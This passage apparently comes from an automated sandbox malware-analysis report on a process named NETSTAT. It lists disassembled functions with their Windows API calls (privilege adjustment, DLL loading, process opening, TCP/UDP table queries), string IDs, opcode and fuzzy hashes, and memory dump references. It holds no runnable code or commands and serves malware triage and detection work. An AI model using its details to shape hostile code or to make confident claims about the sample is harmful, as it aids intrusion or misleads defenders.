                                                                                                                                                                                  • Instruction ID: 46716c2d1e30133ba6ae8843a3eff8911ac7c62afe082f2a0a96f093028350b9
                                                                                                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85E012B2210208ABDB24EF99CC44EE777ADAF88654F118559BA085B241C630F9118BB0
                                                                                                                                                                                  Function 026BA7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,026AF1D2,026AF1D2,?,00000000,?,?), ref: 026BA7D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                  • Instruction ID: 3e53684d49f7743c621b7cc86e66c05294bd9af2307dd09f17f1bc2fd9dabb1f
                                                                                                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE01AB12102086BDB20DF89CC84EE737ADAF88650F018155BA0857241C930E8118BF5
                                                                                                                                                                                  Function 026AF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,026A8D14,?), ref: 026AF6FB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                  • Instruction ID: 6e635e5bcf057b1daab58d9e77b85523ea17f02c53821e712cdb3714a16c99a2
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 20D05E656503082AE610AAA89C12F6632895B44B04F590064FA48963C3DD50F4018665
                                                                                                                                                                                  Function 026AACE3 Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 026AAD62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                  • Instruction ID: 5678fbf0f8119023520a6922f1bfa2a56e6d24754b831c742f11c7ebeac0a45b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                  • Instruction Fuzzy Hash: E0B09231A941192AEA74D6C89C06B2AB764D78561AF144286BD6CA63C0E9A22D1085E5
                                                                                                                                                                                  Function 03112C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: eff3fe6dc24380f5858dd6d08efa6238c9e985d93b235b4bb6d60cff4e732654
                                                                                                                                                                                  • Instruction ID: 62bfdf041f05408db80ff568369a4f49f963db9373a57f750fd1fa0399bcaa8f
                                                                                                                                                                                  • Opcode Fuzzy Hash: eff3fe6dc24380f5858dd6d08efa6238c9e985d93b235b4bb6d60cff4e732654
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2B09B719015D5C7DA11E76047097177D0467D4701F2AC471D3030641E4739C1E1E275

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 00641715 Relevance: 56.5, APIs: 23, Strings: 9, Instructions: 460sleepmemorythreadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 0064177B
                                                                                                                                                                                  • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 0064178A
                                                                                                                                                                                    • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
                                                                                                                                                                                    • Part of subcall function 00644662: fgetpos.MSVCRT ref: 00644697
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 006446B1
                                                                                                                                                                                    • Part of subcall function 00644662: _setmode.MSVCRT ref: 006446B9
                                                                                                                                                                                    • Part of subcall function 00644662: fwprintf.MSVCRT ref: 006446C5
                                                                                                                                                                                    • Part of subcall function 00644662: fgetpos.MSVCRT ref: 006446DE
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 006446F8
                                                                                                                                                                                    • Part of subcall function 00644662: _setmode.MSVCRT ref: 00644700
                                                                                                                                                                                    • Part of subcall function 00644662: _fileno.MSVCRT ref: 00644710
                                                                                                                                                                                    • Part of subcall function 00644662: _write.MSVCRT ref: 00644718
                                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 006417C3
                                                                                                                                                                                  • exit.MSVCRT ref: 006417EC
                                                                                                                                                                                  • _strupr.MSVCRT ref: 00641812
                                                                                                                                                                                  • sscanf_s.MSVCRT ref: 00641920
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641946
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641963
                                                                                                                                                                                  • toupper.MSVCRT ref: 00641982
                                                                                                                                                                                  • toupper.MSVCRT ref: 0064199F
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419BC
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419D6
                                                                                                                                                                                  • toupper.MSVCRT ref: 006419F0
                                                                                                                                                                                  • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00641B1D
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00641B36
                                                                                                                                                                                    • Part of subcall function 0064485E: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,000000FF,00000000,00000000,00000001,00000001,?,00642E0C,00000000,00002718,?,00000000,000000FF), ref: 00644885
                                                                                                                                                                                    • Part of subcall function 0064485E: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(000000FF,?,00642E0C,00000000,00002718,?,00000000,000000FF), ref: 0064489D
                                                                                                                                                                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00641C61
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: toupper$_fileno$FormatFreeLocalMessage_setmodefgetpos$HeapInformationLanguageSleepStartupThread__iob_func_strupr_writeexitfwprintfsscanf_s
                                                                                                                                                                                  • String ID: $%lu$ICMP$ICMPV6$IPV6$TCP$TCPV6$UDP$UDPV6
                                                                                                                                                                                  • API String ID: 2214462882-2943784616
                                                                                                                                                                                  • Opcode ID: 573e3c3e8f7eb8cf158573cbdacdcb81818371506d3f2924f87ddd128922ef5a
                                                                                                                                                                                  • Instruction ID: a608acbdbfd569edbef7858e54ddaf611cb09896a71ad5939f3d50cfc5be5cf5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 573e3c3e8f7eb8cf158573cbdacdcb81818371506d3f2924f87ddd128922ef5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF1C130A483419FE7689B6498957BE7BE7AF47711F64181EF4C68F291DB34C8C28B06
                                                                                                                                                                                  Function 00642167 Relevance: 50.1, APIs: 33, Instructions: 595networkmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,000000FF), ref: 0064217A
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064228D
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064229D
                                                                                                                                                                                  • InternalGetTcpTableWithOwnerModule.IPHLPAPI(?,00000000,00000000), ref: 006422E2
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642324
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642335
                                                                                                                                                                                  • InternalGetTcpTable2.IPHLPAPI(?,00000000,00000000), ref: 00642377
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006423B5
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006423C6
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00642406
                                                                                                                                                                                  • InternalGetBoundTcpEndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00642419
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064243D
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064244E
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0064248A
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006424EA
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006424FA
                                                                                                                                                                                  • InternalGetTcp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642540
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642582
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642593
                                                                                                                                                                                  • InternalGetTcp6Table2.IPHLPAPI(00000000,00000000,00000000), ref: 006425D1
                                                                                                                                                                                  • htons.WS2_32(?), ref: 0064260F
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642620
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00642660
                                                                                                                                                                                  • InternalGetBoundTcp6EndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00642677
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006426AB
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006426BC
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 006426FC
                                                                                                                                                                                  • InternalGetUdpTableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642718
                                                                                                                                                                                  • htons.WS2_32(?), ref: 00642748
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00642780
                                                                                                                                                                                  • InternalGetUdp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00642799
                                                                                                                                                                                  • htons.WS2_32(?), ref: 006427C9
                                                                                                                                                                                  • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 006427FE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: htons$Internal$Heap$FreeTable$ModuleOwnerWith$Tcp6$BoundEndpointTable2$ProcessUdp6
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1690255193-0
                                                                                                                                                                                  • Opcode ID: a9615d96e1af7796edf8ee74b23540ed562064b2f74c59105ceb6ea6728019b6
                                                                                                                                                                                  • Instruction ID: 1333936dfb38a55a5948aa81eb019fcb5c24e7801e4bd82b9b225026b392f84f
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9615d96e1af7796edf8ee74b23540ed562064b2f74c59105ceb6ea6728019b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D325675D00219DFCB25DFA4C894AEEBBB2FF48711F64802AF955A7340DB38A945CB60
                                                                                                                                                                                  Function 00644B96 Relevance: 40.8, APIs: 17, Strings: 6, Instructions: 517COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • fprintf.MSVCRT ref: 00644BF0
                                                                                                                                                                                  • GetUdpStatisticsEx.IPHLPAPI(00000008,00000002), ref: 00644C1E
                                                                                                                                                                                    • Part of subcall function 00646139: __iob_func.MSVCRT ref: 0064613E
                                                                                                                                                                                  • GetTcpStatisticsEx.IPHLPAPI(00000008,00000017), ref: 00645161
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Statistics$__iob_funcfprintf
                                                                                                                                                                                  • String ID: %s $%2d.$%3d.$%d.$ReadTable: type = %d$value=%8d oid=
                                                                                                                                                                                  • API String ID: 2761504588-3074728934
                                                                                                                                                                                  • Opcode ID: b12f6aa33d56e02a68ec0de3781fe97c187eb54df446358670d0db20d6c07304
                                                                                                                                                                                  • Instruction ID: 7ce83236be6c199f52734662f00096d7ec8c6afb2c21a2bebc6a54f8a0c828bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: b12f6aa33d56e02a68ec0de3781fe97c187eb54df446358670d0db20d6c07304
                                                                                                                                                                                  • Instruction Fuzzy Hash: E702B235D04209DFCB14DFA8D84ABAEBBB7BB06700F24455AE506AB741DF319D42CB90
                                                                                                                                                                                  Function 006438D2 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 206COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0064391B
                                                                                                                                                                                  • OpenProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000410,00000000,?,00000000,?,00000000), ref: 00643937
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00643B39
                                                                                                                                                                                  • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00643B44
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Free$LibraryLocalOpenProcessmemset
                                                                                                                                                                                  • String ID: I_QueryTagInformation$\advapi32.dll$rundll32.exe$svchost.exe$Dd
                                                                                                                                                                                  • API String ID: 276527812-705911625
                                                                                                                                                                                  • Opcode ID: 43cef38dfefa7aaafa41c4f35ef8e9b380086979eda04043473ed4037e7edb72
                                                                                                                                                                                  • Instruction ID: dc368f57490b6d9ae196b0c9acb1a806962b7363d1253c62b0d7aeffb2c18cd0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43cef38dfefa7aaafa41c4f35ef8e9b380086979eda04043473ed4037e7edb72
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4761E6719002246FEB649F24DC89EFEB77BEB56710F0041A9F51AE3381EE719E84CA50
                                                                                                                                                                                  Function 00641CFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,00000000,?,?,?,?,?,?,00642809), ref: 00641D15
                                                                                                                                                                                  • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,00642809), ref: 00641D1C
                                                                                                                                                                                  • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,?,00000010,00000000,00000000), ref: 00641D48
                                                                                                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641D56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                                  • String ID: (d
                                                                                                                                                                                  • API String ID: 3874597930-3876776310
                                                                                                                                                                                  • Opcode ID: 2833c9f67404c2ca5abd5eebc449d34f2eaddb4c1f4e5f83dc7e5d0cedd85b3d
                                                                                                                                                                                  • Instruction ID: 676170a874ee788813754e2d7d22c520fc38c231baa57c61f5d87b1af2ece044
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2833c9f67404c2ca5abd5eebc449d34f2eaddb4c1f4e5f83dc7e5d0cedd85b3d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A01FFB4A11219AFDB10AFA5DC09AEFBFBDEF0AB50F504059F505A3251CB709A04CBA5
                                                                                                                                                                                  Function 00641C89 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0064222F), ref: 00641CA2
                                                                                                                                                                                  • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0064222F), ref: 00641CA9
                                                                                                                                                                                  • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00641CD9
                                                                                                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641CE7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                                  • String ID: /"d
                                                                                                                                                                                  • API String ID: 3874597930-557661102
                                                                                                                                                                                  • Opcode ID: 2f816d21da893a0cd969015078ebfc13d41a76fa844478f25d38d945cf297721
                                                                                                                                                                                  • Instruction ID: 54a7855e75a4aaa26e552c066ad345bf7e16c5436f7371832029da5c0610c7a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f816d21da893a0cd969015078ebfc13d41a76fa844478f25d38d945cf297721
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201FF74911219ABDB109FA5DC49AEFBFBDFF0A750F004059B501E3250CB748A44CBA1
                                                                                                                                                                                  Function 00645C30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00645D66,00641000), ref: 00645C37
                                                                                                                                                                                  • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(f]d,?,00645D66,00641000), ref: 00645C40
                                                                                                                                                                                  • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00645D66,00641000), ref: 00645C4B
                                                                                                                                                                                  • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00645D66,00641000), ref: 00645C52
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                  • String ID: f]d
                                                                                                                                                                                  • API String ID: 3231755760-4140951768
                                                                                                                                                                                  • Opcode ID: cdecd3ba2fd4da8969b750ff81b62cb88308ca758aae82b31dcf61a3cced5de1
                                                                                                                                                                                  • Instruction ID: bfa65b3c62f5ae5ebce9a3e8b712d5be8574025cb907a455b6501d5390b1e0f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdecd3ba2fd4da8969b750ff81b62cb88308ca758aae82b31dcf61a3cced5de1
                                                                                                                                                                                  • Instruction Fuzzy Hash: C5D01236010204BFC7102BE1FC0CA4E3F6AEB46B12F046400F30D93020CF314489DB51
                                                                                                                                                                                  Function 00645FE5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00646012
                                                                                                                                                                                  • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00646021
                                                                                                                                                                                  • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0064602A
                                                                                                                                                                                  • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00646033
                                                                                                                                                                                  • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00646048
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1445889803-0
                                                                                                                                                                                  • Opcode ID: 07ecbe1750ccd1a41c7a57a195459fcf40a8a4ec03ea87f5e75d8aeb2ca45802
                                                                                                                                                                                  • Instruction ID: 39e24726dd870562312ef5bf713c91869e869ce9fab212be1691524877a533dc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07ecbe1750ccd1a41c7a57a195459fcf40a8a4ec03ea87f5e75d8aeb2ca45802
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54111CB5D01208DFCB10DFB8EA4869EB7F6FF5A711F515495E501E7210EB309A008B45
                                                                                                                                                                                  Function 006458B6 Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,000000FF), ref: 006458E7
                                                                                                                                                                                  • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 006458FC
                                                                                                                                                                                  • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 0064590F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3429775523-0
                                                                                                                                                                                  • Opcode ID: fdf4e892d53d8bc5bae3d1ede6c5f5fb568a9ca8e40b79f8b75ad9391e0de9c0
                                                                                                                                                                                  • Instruction ID: 73b52ee44404e34ae17884a6d6899297ef2e87b1dc424406803c2666a4b8ff04
                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf4e892d53d8bc5bae3d1ede6c5f5fb568a9ca8e40b79f8b75ad9391e0de9c0
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2011AB591020AAFDF00DFE0CD859FEBBB9FB05300F50146AA512A3141DB749A05CB60
                                                                                                                                                                                  Function 00645DC0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00005D70), ref: 00645DC5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                  • Opcode ID: 92d82e05d1968431aad957722df396c568294cab242ef1dfed7da415e582c706
                                                                                                                                                                                  • Instruction ID: c9c09fe18b93ef1eb7f88986be2000fa8f5ff25ab7f5cf384ec89d1b3115131c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92d82e05d1968431aad957722df396c568294cab242ef1dfed7da415e582c706
                                                                                                                                                                                  • Instruction Fuzzy Hash: 029002646A1E004F474067B05D0D50925925E59A027822450A142D5095DE5040445915
                                                                                                                                                                                  Function 00644724 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 124memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • fflush.MSVCRT ref: 00644740
                                                                                                                                                                                    • Part of subcall function 00644530: _fileno.MSVCRT ref: 0064453B
                                                                                                                                                                                    • Part of subcall function 00644530: _get_osfhandle.MSVCRT ref: 00644542
                                                                                                                                                                                  • _fileno.MSVCRT ref: 00644760
                                                                                                                                                                                  • _setmode.MSVCRT ref: 00644768
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0064478B
